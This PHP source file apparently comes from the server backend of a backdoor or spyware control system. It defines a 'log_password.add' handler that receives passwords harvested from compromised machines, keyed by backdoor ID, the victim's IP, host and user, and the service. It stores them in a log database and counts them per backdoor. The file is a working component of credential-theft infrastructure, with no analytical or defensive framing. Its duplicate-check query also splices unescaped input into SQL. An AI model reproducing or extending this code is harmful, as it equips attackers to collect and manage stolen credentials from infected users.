<?php

//////////
///
///   log_password.inc.php
///
//////////

require_once('lib/commons.inc.php');



/*************\
*   METHODS   *
\*************/

$dm['log_password.add'] = array('func'   => 'log_password_add',
                                'perm'   => AL_SERV,
                                'escape' => false);



/***************\
*   FUNCTIONS   *
\***************/

function log_password_add($backdoor_id, $remoteip, $remotehost, $remoteuser, $logarray)
{
   // varchar1  <= resource
   // varchar2  <= service
   // varchar3  <= password
   // varchar4  <= userid
   // int1      <= -
   // int2      <= -
   // int3      <= -
   // longtext1 <= -
   // longblob1 <= -

   if(!is_success(($ret = db_escape($backdoor_id)))) return $ret;
   if(!is_success(($ret = db_escape($remoteip)))) return $ret;
   if(!is_success(($ret = db_escape($remotehost)))) return $ret;
   if(!is_success(($ret = db_escape($remoteuser)))) return $ret;

   $sql  = "INSERT INTO `log` (`backdoor_id`, ";
   $sql .=                    "`type`, ";
   $sql .=                    "`flags`, ";
   $sql .=                    "`remoteip`, ";
   $sql .=                    "`remotehost`, ";
   $sql .=                    "`remoteuser`, ";
   $sql .=                    "`received`, ";
   $sql .=                    "`acquired`, ";
   $sql .=                    "`varchar1`, ";
   $sql .=                    "`varchar2`, ";
   $sql .=                    "`varchar3`, ";
   $sql .=                    "`varchar4`) ";
   $sql .= "VALUES ('$backdoor_id', 'PASSWORD', ?, '$remoteip', '$remotehost', '$remoteuser', UTC_TIMESTAMP(), ?, ?, ?, ?, ?)";

   $ret = db_prepare($sql);

   if(!is_success($ret)) {
      return $ret;
   }

   $stmt = $ret['payload'];

   foreach($logarray as $log) {
      $sql  = "SELECT `log_id` ";
      $sql .= "FROM `log` ";
      $sql .= "WHERE (`backdoor_id` = '$backdoor_id') AND ";
      $sql .=       "(`type` = 'PASSWORD') AND ";
      $sql .=       "(`remotehost` = '$remotehost') AND ";
      $sql .=       "(`remoteuser` = '$remoteuser') AND ";
      $sql .=       "(`varchar1` = '".$log['resource']."') AND ";
      $sql .=       "(`varchar2` = '".$log['service']."') AND ";
      $sql .=       "(`varchar3` = '".$log['password']."') AND ";
      $sql .=       "(`varchar4` = '".$log['userid']."')";

      $ret = db_query($sql);

      if(!is_success($ret)) {
         return $ret;
      } else if($ret['payload'] === false) {
         $params = array(array('t' => 'i', 'v' => $log['flags']),
                         array('t' => 's', 'v' => str_replace(':', '', $log['acquired']->scalar)),
                         array('t' => 's', 'v' => $log['resource']),
                         array('t' => 's', 'v' => $log['service']),
                         array('t' => 's', 'v' => $log['password']),
                         array('t' => 's', 'v' => $log['userid']));

         $ret = db_execute($stmt, $params);

         if(!is_success($ret)) {
            return $ret;
         }

         $sql  = "UPDATE `stat` ";
         $sql .= "SET `password` = `password` + 1, ";
         $sql .=     "`password_new` = `password_new` + 1 ";
         $sql .= "WHERE `backdoor_id` = '$backdoor_id'";

         $ret = db_query($sql);
      } else {
         $sql  = "UPDATE `log` ";
         $sql .= "SET `received` = UTC_TIMESTAMP() ";
         $sql .= "WHERE `log_id` = '".$ret['payload'][0]->log_id."'";

         $ret = db_query($sql);
      }

      if(!is_success($ret)) {
         return $ret;
      }
   }

   return success(true);
}

?>
